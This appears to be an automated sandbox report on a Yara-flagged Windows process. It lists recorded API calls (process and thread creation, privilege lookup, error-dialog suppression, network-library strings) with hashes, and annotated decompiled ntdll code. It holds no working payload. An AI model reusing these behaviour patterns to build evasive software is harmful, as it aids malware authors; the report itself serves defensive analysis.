                                                                    • Opcode ID: f6b32ffb833f65551ddfe2a1b708f8ede6d9fbcd98b25e1e1a5bd1087a414c0c
                                                                    • Instruction ID: b227a1d77084f634421e2b1bafcf60c07633cf7548d297015e7fc6280fc0836c
                                                                    • Opcode Fuzzy Hash: f6b32ffb833f65551ddfe2a1b708f8ede6d9fbcd98b25e1e1a5bd1087a414c0c
                                                                    • Instruction Fuzzy Hash: E290027120100413D11565994545707002D97D0291FD1D512A041465CDA6D68952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5a1b2365532e8d35e751649c4adfdffdd128a2b520ebf07d4107802a8d9bfb63
                                                                    • Instruction ID: cc4858cf9fd9c6e05bb392901626d63e9ff602f2fb5909c5093da5cb2c06c6e9
                                                                    • Opcode Fuzzy Hash: 5a1b2365532e8d35e751649c4adfdffdd128a2b520ebf07d4107802a8d9bfb63
                                                                    • Instruction Fuzzy Hash: 0190026121180042D20469A94C55B07002997D0353F91D215A0144658CD9958861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 033273B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 7238354acd6bffc519e80105fcf1543e7eee48473a8657143753e7ac47c44896
                                                                    • Instruction ID: 6e539f98ac182533fa8e4af5ea1c84a14c1af49feb1a3f07249b05cf1ed74504
                                                                    • Opcode Fuzzy Hash: 7238354acd6bffc519e80105fcf1543e7eee48473a8657143753e7ac47c44896
                                                                    • Instruction Fuzzy Hash: 18316EB6902704ABD711DF64C8E0FA7BBB8BF88700F04811DFA595B241D774A555CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 033273B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: cb63563684f7bb83f73f435358ed0f1cf794e6001f1ea9505927aaa0b0301a8a
                                                                    • Instruction ID: da098c3164df52e715518e33e8844a5115df5fef24a6b066b2068dcb8dbf733d
                                                                    • Opcode Fuzzy Hash: cb63563684f7bb83f73f435358ed0f1cf794e6001f1ea9505927aaa0b0301a8a
                                                                    • Instruction Fuzzy Hash: C52189B6A01200ABD711DF64C8E1FABBBA8BB88700F048519FA199B641D774A556CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03313B93), ref: 0332892D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 5ebb27cdd740a18fd2429c4534eb2fecf5df32bd788e03670e4e5afa29a543b2
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: CDE046B5200318ABDB18EF99CC88EA777ACEF88750F018558FE085B242C630F910CAF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 033172EA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0331730B
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 65b6b7f1cbdfb23ed4fcbbfb44b911093864a8b016dd4e1cff45753e09de2d3c
                                                                    • Instruction ID: ff9c9809ce834446e58bab0594d59c8a4d240b0d561c5eabf57c6df6da7aab42
                                                                    • Opcode Fuzzy Hash: 65b6b7f1cbdfb23ed4fcbbfb44b911093864a8b016dd4e1cff45753e09de2d3c
                                                                    • Instruction Fuzzy Hash: 3F01A235E803287BE725E6949C82FBE7B6C9B00B51F084118FF04BE2C0EA94691647F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 033289C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: 0385ef74ad40b80ae0d23437533f7000aad00e4d4517b2494c83780a65bd6808
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: 2301AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0331CD00,?,?), ref: 0332747C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                                                                    • Instruction ID: 593840a3ce114d26291ccf5805be388e90cccbd4fca65d616dbb50cbd3783e85
                                                                    • Opcode Fuzzy Hash: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                                                                    • Instruction Fuzzy Hash: CFF0277228031436D230A56C9C42F97BF98DB50F10F184119F689AB1C2D990F4454694
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0331CD00,?,?), ref: 0332747C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                                    • Instruction ID: d0af7d40075c9858b7a16036cfe1de7a2c1a4e10512f8e58e589bf8f86970c0c
                                                                    • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                                    • Instruction Fuzzy Hash: 8CE092377803243AE330A59DAC42FA7B79CDB81B30F240026FA4DEB2C1D595F80142E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0331CFD2,0331CFD2,?,00000000,?,?), ref: 03328A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                                                                    • Instruction ID: 6d0942919895855db5db95b22b331daf9cf1b9d7640f05aca04ee2f66e38731b
                                                                    • Opcode Fuzzy Hash: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                                                                    • Instruction Fuzzy Hash: E5E06DB16003186BC720DF89CC86FDB3B69AF84650F018169FD0D6B242C931E9158BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0331CFD2,0331CFD2,?,00000000,?,?), ref: 03328A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: d163f338e1c3b69d13dd4c7306a98eeca9d901e46974409e2393a906b9faecbf
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: 36E01AB56003186BDB10DF49CC84EE737ADAF88650F018154BE085B242CA30F8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(03323546,?,03323CBF,03323CBF,?,03323546,?,?,?,?,?,00000000,00000000,?), ref: 033288ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: e4906e44f1fb594d73e6097d2e9d2f64351f9f17ff1719e51688e48cc5804758
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: F2E012B5200318ABDB14EF99CC84EA777ACAF88650F118558BE085B242C630F910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,03317C93,?), ref: 0331D46B (0x8003 = SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX, which suppresses the critical-error, GP-fault and open-file error dialogs for the calling process)
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction ID: 5d7724b46a80e83f35900eed047a50a637fb461dd3540042891dd52089f0f84a
                                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction Fuzzy Hash: 6DD0A7767903083BE610FAA89C43F2672CC5B45A10F494064F949DB3C3DD54F4004561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bbddc879283b4e77a6ada6e8086fcf40f3b037d1086a9fb20017ef771f71741a
                                                                    • Instruction ID: f8b771584563eab2e3066e72cd6aa6b86ccf0c9f5722e190f482e0aa6d85d289
                                                                    • Opcode Fuzzy Hash: bbddc879283b4e77a6ada6e8086fcf40f3b037d1086a9fb20017ef771f71741a
                                                                    • Instruction Fuzzy Hash: E6B09B719014C5C5D615D7A14608B277A257BD0751F56C151D2020745A4778C091F6B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			/* Decompiled critical-section timeout diagnostic: the two "RTL:" format strings
                                                                    			   are the ones ntdll prints when a contended critical section wait times out.
                                                                    			   Annotations below decode the raw offsets; the code itself is the decompiler output. */
                                                                    			E0564FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;                       /* __edx -> 64-bit timeout (LARGE_INTEGER) */
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];                 /* fs:[0x18] is the TEB self pointer on x86 */
                                                                    				_t15 = _t12;                        /* _t12 -> RTL_CRITICAL_SECTION */
                                                                    				/* 0xFFFFFFFFFF676980 = -10,000,000 (one second in 100 ns units): converts the
                                                                    				   relative timeout into whole seconds for the message below */
                                                                    				_t7 = E055FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				/* DbgPrintEx(ComponentId, Level, Format, ...) shape: 0x65 = DPFLTR_DEFAULT_ID, 1 = DPFLTR_WARNING_LEVEL */
                                                                    				E05645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;                       /* RTL_CRITICAL_SECTION.DebugInfo; -1 means no debug block */
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14)); /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount (x86 offset 0x14) */
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));  /* RTL_CRITICAL_SECTION.OwningThread */
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24))); /* TEB.ClientId.UniqueThread (x86) */
                                                                    				/* Level 0 = DPFLTR_ERROR_LEVEL; TEB+0x20 = ClientId.UniqueProcess (x86) */
                                                                    				return E05645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}
                                                                    Instruction addresses for the listing above (in statement order): 0x0564fdda, 0x0564fde2, 0x0564fde5, 0x0564fdec, 0x0564fdfa, 0x0564fdff, 0x0564fe0a, 0x0564fe0f, 0x0564fe17, 0x0564fe1e, 0x0564fe19, 0x0564fe19, 0x0564fe19, 0x0564fe20, 0x0564fe21, 0x0564fe22, 0x0564fe25, 0x0564fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0564FDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0564FE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0564FE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: a5f5c28982bfbc77b80a0fcd4c1785e842a9cd6b42db0908b7faea86f2f3327f
                                                                    • Instruction ID: bc118a6b2a0769a1fa695a9bfb4d251df924e124a803cee3d0e59b4e960f5cac
                                                                    • Opcode Fuzzy Hash: a5f5c28982bfbc77b80a0fcd4c1785e842a9cd6b42db0908b7faea86f2f3327f
                                                                    • Instruction Fuzzy Hash: 62F0F636244201BFE7201A45DC06F63BF5AEB44730F144314F628566D1DA62F820DBF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%